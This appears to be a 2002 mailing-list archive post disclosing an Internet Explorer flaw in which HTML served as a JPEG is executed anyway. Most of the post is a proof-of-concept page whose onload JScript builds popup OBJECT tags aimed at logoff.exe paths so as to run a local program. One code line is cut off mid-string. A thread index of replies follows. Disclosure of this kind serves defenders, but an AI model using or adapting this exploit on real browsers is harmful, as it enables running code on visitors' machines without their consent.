Vulnerability Development mailing list archives

Rather large MSIE-hole

From: Magnus Bodin <magnus () bodin org>
Date: Tue, 12 Mar 2002 11:32:20 +0100


The latest MSIE-hole is now spreading.

THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
Content-Type if it "thinks" it knows better, then the code is executed.
This in combination with the malicious code that is possible to run, then
an "innocent.jpg" with the following content will log off an XP-user.

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>

<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
    'c:/windows/system32/logoff.exe',
    'c:/winxp/system32/logoff.exe',
    'c:/winnt/system32/logoff.exe'
);

function Init(){
    var oPopup=window.createPopup();
    var oPopBody=oPopup.document.body;
    var n,html='';
    for(n=0;n<programName.length;n++)
        html+="<OBJECT NAME='X'
CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
    oPopBody.innerHTML=html;
    oPopup.show(290, 390, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----


-- 
magnus                               MICROS~1 BOB was written in Lisp.         
            http://x42.com/

Current thread:

Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole Jon Zobrist (Mar 12)
- Disabling the MSIE hole. Suresh P (Mar 12)
  - Re: Disabling the MSIE hole. Bob at firstcodings (Mar 13)
  - RE: Disabling the MSIE hole. leon (Mar 13)
    - Re: Disabling the MSIE hole. Magnus Bodin (Mar 13)
- Re: Rather large MSIE-hole Magnus Bodin (Mar 12)
  - Re: Rather large MSIE-hole NyQuist (Mar 13)
    - Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
    - Re: Rather large MSIE-hole methodic (Mar 14)
    - Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)

(Thread continues...)